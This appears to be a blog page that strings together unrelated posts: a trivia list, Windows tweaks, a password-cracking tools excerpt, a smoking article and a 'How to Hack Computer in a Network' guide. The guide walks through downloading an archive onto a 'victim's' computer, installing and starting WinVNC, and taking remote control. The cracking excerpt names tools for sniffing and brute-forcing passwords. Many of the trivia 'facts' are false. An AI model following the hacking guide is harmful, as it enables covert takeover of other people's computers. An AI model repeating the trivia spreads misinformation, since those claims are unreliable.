Most interested facts

Interested facts

1... Coca-Cola was originally green.

2.. The most common name in the world is Mohammed.

3.. The name of all the continents ends with the same
letter that they start with.

4.. The strongest muscle in the body is the tongue.

5.. There are two credit cards for every person in the
United States.

6.. TYPEWRITER is the longest word that can be made
using the letters only on one row ! of the keyboard.

7.. Women blink nearly twice as much as men!!

8.. You can't kill yourself by holding your breath.

9.. It is impossible to lick your elbow.

10.. People say "Bless you" when you sneeze because
when you sneeze, your heart stops for a millisecond.

11.. It is physically impossible for pigs to look up
into the sky.

12.. The "sixth sick sheik's sixth sheep's sick" is
said to be the toughest tongue twister in the English language.

13.. If you sneeze too hard, you can fracture a rib.
If you try to suppress a sneeze, you can rupture a blood vessel in
your head or neck and die.

14.. Each kin g in a deck of playing cards represents
great king from history.

Spades - King David
Clubs - Alexander the Great,
Hearts -Charlemagne
Diamonds - Julius Caesar.

15.. 111,111,111 x 111,111,111 = 12,345,678,987,654,321

16.. If a statue of a person in the park on a horse
has both front legs in the air, the person died in battle.

If the horse has one front leg in the air, the person
died as a result of wounds received in battle.

If the horse has all four legs on the ground,
the person died of natural causes.

17.. What do bullet proof vests, fire escapes,
windshield wipers and laser printers all have
in common? Ans. - All invented by women.

18.. Question - This is the only food that doesn't
spoil. What is this? Ans. - Honey

19.. A crocodile cannot stick its tongue out.

20.. A snail can sleep for three years.

21.. All polar bears are left handed.

22.. Butterflies taste with their feet.

23.. Elephants are the only animals that can't jump.

24.. In the last 4000 years, no new animals have been
domesticated.

25.. On average, people fear spiders more than they do
death.

26.. Shakespeare invented the word 'assassination' and
'bump'.

27.. Stewardesses is the longest word typed with only
the left hand.

28.. The ant always falls over on its right side when
intoxicated.

29.. The electric chair was invented by a dentist.

30.. The human heart creates enough pressure when it
pumps out to the body to squirt blood 30 feet.

31.. Rats multiply so quickly that in 18 months, two
rats could have over million descendants.

32.. Wearing headphones for just an hour will increase
the bacteria in your ear by 700 times.

33.. The cigarette lighter was invented before the
match.

34.. Most lipstick contains fish scales.

35.. Like fingerprints, everyone's tongue print is

different

Block access to safe mode

Disable F8 Key to Block Access to Safe Mode during Windows Startup

Disabling Windows Safe Mode is not the perfect way of prevent the computer from being messed around but it goes give some extra security.

The last time I found out that we can disable access to safe mode by changing the Minimal and Network keys in registry to cause the computer to blue screen whenever you try to boot in to Safe Mode. It’s a fairly simple trick that works, maybe a little too simple that when the attacker knows about this trick, he/she can reverse the changes by editing the registry.
No worries, I found two more methods on how to disable the F8 key before booting up Windows.

The first and widely known method is to hexedit the hidden NTLDR file in the root of the drive where the operating system is installed. Please take note that this method only works on XP and not Vista since Vista no longer has NTLDR. Just follow the steps below on how to do it.

1. Assuming that you installed Windows in C: drive, type this in run attrib -r -s -h -a c:\ntldr
If you installed Windows in D: drive, then change o d:\ntldr

2. Backup ntldr file in C: drive to another name. You can do that by copying and pasting to the same location to get a new file “Copy of ntldr”

3. Download a free portable hex editor, extract and run Hedit.exe

4. Go to File > Open, select C:\ drive on the right hand side and look for ntldr file on the left box. Select the ntldr file and click OK.

5. Scroll down a little and look for the line 00000770 and change the values 0f 85 09 to 90 90 90.
disable F8 in Vista
6. Click File > Save and close Hedit.

7. Type this command in run attrib +r +s +h +a c:\ntldr

You can now restart your computer and both F8 and F5 key no longer works before starting up Windows! This hack totally disable keyboard input so that when you hit F8 or F5 before starting up Windows, there is no effect at all. If you have multiple operating system installed, this method would not be the best choice because you can’t move up or down to select which operating system to boot in to. When you want to boot in to Safe Mode when Windows is unable to start, you can boot up the computer with UBCD, linux live cd or even windows installation disc for recovery console and rename the “Copy of ntldr” file to ntldr. This way you can use the F8 key again.

High-tech password cracking

High-tech password cracking involves using a program that tries to guess a

password by determining all possible password combinations. These hightech

methods are mostly automated after you access the computer and password

database files.

Password cracking software

You can try to crack your organization’s operating-system and Internetapplication

passwords with various password cracking tools:


  •  LC4 (previously called L0phtcrack) can sniff out password hashes fromthe wire. Go to www.atstake.com/research/lc

  •  NetBIOS Auditing Tool (NAT) specializes in network-based passwordattacks. Go to www.securityfocus.com/tools/543

  •  Chknull (www.phreak.org/archives/exploits/novell) for Novell NetWare password testing

  •  These tools require physical access on the tested computer:


• John the Ripper (www.openwall.com/john)


• pwdump2 (razor.bindview.com/tools/desc/pwdump2_readme.html)


• Crack (coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack)


• Brutus (www.hoobie.net/brutus)


• Pandora (www.nmrc.org/project/pandora)


• NTFSDOS Professional (www.winternals.com)


 Various other handy password tools exist, such as


• GetPass for decrypting login passwords for Cisco routers (www.

boson.com/promo/utilities/getpass/getpass_utility.htm)


• Win Sniffer for capturing FTP, e-mail, and other types of passwords

off the network


• Cain and Abel for capturing, cracking, and even calculating various

types of passwords on a plethora of systems (www.oxid.it/

cain.html)


You may be wondering what value a password-cracking tool offers if you need

physical access to your systems to test them. Some would say that if a hacker

can obtain physical access to your systems and password files, you have

more than just basic information-security problems to worry about. But this

kind of access is entirely possible! What about a summer intern, a disgruntled

employee, or an outside consultant with malicious intent?

Password-cracking utilities take a set of known passwords and run them

through a password-hashing algorithm. The resulting hashes — or an

encrypted form of a data set — are then compared at lightning speed to the

password hashes extracted from the original password database. When a

match is found between the newly generated hash and the hash in the original

database, the password has been cracked. It’s that simple.

Other password-cracking programs simply attempt to logon using a predefined

set of user IDs and passwords. In fact, NAT can do just that. NAT takes

advantage of some known weaknesses in Microsoft’s Server Message Block

(SMB) protocol, which is used for file and print sharing.

Try running NAT in a real-world scenario. Simply download NAT from the preceding

address, and extract it to a temporary directory on your hard drive.

NAT comes with some predefined usernames and passwords in the userlist.

txt and passlist.txt files, but you can modify them or add your own.

For a quick test of a Windows NT or 2000 machine across the network, enter this

basic NAT command at a command prompt:

Output from the NetBIOS Auditing Tool

NAT used the default password list to crack the administrator password in just a

few seconds. If you don’t have any luck, consider using one of the dictionary

files listed in the next section. Just give the test some time. If you use one of

the larger lists, the process may take quite a while.

Passwords that are subjected to cracking tools eventually lose. You have

access to the same tools as the bad guys. These tools can be used for both

legitimate auditing and malicious attacks. You want to audit your passwords

before the bad guys do, and in this section, I show you some of my favorite

methods for auditing Windows and Linux/UNIX passwords.

When trying to crack passwords, the associated user accounts may be locked

out, which could interrupt your users. Be careful if you have intruder lockout

enabled — you may have to go back in and reenable locked accounts.

Hack computer

How to Hack Computer in a Network..!!!

1st step:
get to the victim’s computer and download this file
http://wwww.filefactory.com/file/0313ca/

2nd step:
unzip it in the C:\
with the password “metacafe”

3rd step:
from start menu open run and
type “cmd” ok.
it will open the prompt command

in the prompt command
type “cd..” and enter until you
retch “C:\” then type
>winvnc.exe -install

it will tell you in a text message
that its successfully installed then
type
>net start winvnc
to start this service

After that it will appear the winvnc
default local system properties
window, chose your own there but
don’t forget to make your
password over there

before you close the command
prompt and be done don’t forget
to get the computer’s IP,
type there
>ipconfig

now, download in your computer
the VNC viewer to connect with
the victim’s computer
www.realvnc.com/products/download.html

type there the victims IP adress
and you will get control

Boot your Computer Faster

Many computers take a lot of time to boot (or start ).This is due to many reasons.


Some slight changes can do wonders for your system:


1.
Press start->run then type msconfig and press enter.

Go to the startup tab. Here you will see a list of startup items. These are all the programs that automatically start when you boot your PC. It is these that slow down the boot up process.

So uncheck all the unwanted items like ms-office, messengers other utilities that u may not need at startup). Don’t uncheck your antivirus software.

Restart your Pc to and see for yourself, your pc will now boot faster….


2.
A great new feature in Microsoft Windows XP is the ability to do a boot defragment. This places all boot files next to each other on the disk to allow for faster booting. By default this option is enabled, but on some systems it is not, so below is the information on how to turn it on:

Go to Start Menu and Click Run

Type in regedit then click ok
Find “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction”
Select “Enable” from the list on the right
Right on it and select “Modify”
Change the value to Y .
Reboot your Pc and see the change yourself.


3
.SPEED UP BOOT BY DISABLING UNUSED PORTS.!!

You may have tried many tweaks like modifying windows XP start-up applications, prefetches, unload DLLs method, etc. And yes those methods do work for me.
I have just accidentally found out another way to give you an extra boost in windows XP’s boot performance. This is done by disabling your unused devices in
Device Manager. for example, if you don’t have input devices that are connected to one of your USB’s or COM ports, disabling them will give you an extra performance boost in booting. Go to Control Panel -> System -> Hardware tab -> device manager Disable devices that you don’t use for your PC and then restart
.

Deleting recycle bin

Start] [Run] [Regedit] Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket Modify/Create the Value Data Type(s) and Value Name(s) as detailed below. Data Type: DWORD // Value Name: NukeOnDelete Setting for Value Data: [0 = Use Recycle Bin / 1 = Permanently Delete] Exit Registry and Reboot


start->run->gpedit.msc-> user configuration ->desktop->remove recycle bin from desktop->double click->change it not configured to enable->apply and ok. now come to start->run->gpupdate.exe and press enter. your recycle bin icon is gone from desktop nad you will need to revert your settings for get that back. after reverting setting make sure to run gpupdate.exe command.

A DANGEROUS ADDICTION

SMOKING

Tobacco smoking is the practice where the substance, tobacco, is burned (pyrolyzed) and the vapors either tasted or inhaled.Smoking is the most common method of consuming tobacco.

Tobacco is likewise the most common substance smoked. The agricultural product is often mixed with other additives and then pyrolyzed. The resulting vapors are then inhaled and the active substances absorbed through the alveoli in the lungs. The active substances trigger chemical reactions in nerve endings which high tens heart rate, memory, alertness,and reaction time.Dopamine and later endorphins are released, which are often associated with reward and pleasure.
Many smokers begin during adolescence or early adulthood. During the early stages, smoking provides pleasurable sensations and thus serves as a source of positive reinforcement. After an individual has smoked for many years, the avoidance of withdrawal symptoms and negative reinforcement become the key motivations.

Different methods of consumption of tobacco:-

Beedi
Beedis are thin, often flavored, South Asian cigarette made of tobacco wrapped in a tendu leaf, and secured with colored thread at one end.Bidis smoke produce higher levels of carbon monoxide, nicotine, and tar than cigarettes.
Cigars

Cigars are tightly rolled bundle of dried and fermented tobacco which is ignited so that its smoke may be drawn into the smoker's mouth. They are generally not inhaled because the high alkalinity of the smoke, which can quickly become irritating to the trachea and lungs.
Instead they are generally drawn into the mouth.
Cigarettes
Cigarettes, French for "small cigar", are a product consumed through smoking and manufactured out of cured and finely cut tobacco leaves and reconstituted tobacco, often combined with other additives, which are then rolled or stuffed into a paper-wrapped cylinder.Cigarettes are ignited and inhaled, usually through a cellulose acetate filter, into the mouth and lungs. Cigarette smoking is the most common method of consumption.
Electronic cigarette
It is a battery-powered device that provides inhaled doses of nicotine by delivering a vaporized propylene glycol/nicotine solution.
Hookah
Hookah are a single or multi-stemmed (often glass-based) water pipe for smoking. Originally from India, the hookah has gained immense popularity, especially in the middle east. A hookah operates by water filtration and indirect heat. It can be used for smoking herbal fruits, tobacco, or cannabis.
Roll-Your-Own
Roll-Your-Own or hand-rolled cigarettes, are very popular particularly in European countries. These are prepared from loose tobacco, cigarette papers and filters all bought separately. They are usually much cheaper to make.
Recent study reveals that Tobacco smoking is a major cause of mortality.Use of tobacco in both chewable and non-chewable forms is equally injurious & can lead to disease, disability& death.Tobacco consumption is not only a health hazard but also an economic, social & psychology hazard.
Types of Smokers:
1) Positive affect smoker is one who enjoys smoking and receives pleasure from manipulating the cigarette by blowing smoke rings.

2) Negative affect smoker is one who smokes during times of stress or crisis such as nervousness, anxiety& anger.

3) Addictive smoker is ne who smokes to satisfy a craving or to solve a problem.

4) Habitual smoker is a chain smoker.In such cases one smokes without being consciously aware that he/she is smoking.

Hazards of smoking:
  • Causes cancer and degenerative diseases such as chronic obstructive pulmonary disease(COPD) & coronary artery disease(CAD).
  • Increases the risk of heart attack, stroke (paralysis) or premature hardening of coronary arteries producing angina or sudden cardiac death.
  • Tendency for hypertension,palpitation & clot formation.
  • Bad breath. Cigarettes leave smokers with a condition called halitosis, or persistent bad breath.
  • Reduced athletic performance. People who smoke usually can't compete with nonsmoking peers because the physical effects of smoking (like rapid heartbeat, decreased circulation, and shortness of breath) impair sports performance.

Releases various toxic chemicals in the such as:
  • Carbon monoxides which produces carboxy hemoglobin reducing oxygen supply to brain & various tissues.
  • Tar which causes cancer of lips, tongue, pharynx, larynx, lung stomach, liver, ovary etc.
  • Nicotine which decreases sense of taste, touch & smell.
Try to quit smoking with the help of activities like :
  • Meditation
  • Regular exercise
  • Sattvic diet
  • Disciplined diet
  • Medication(consult doctors)
Quit smoking before you'll smoke become like this ---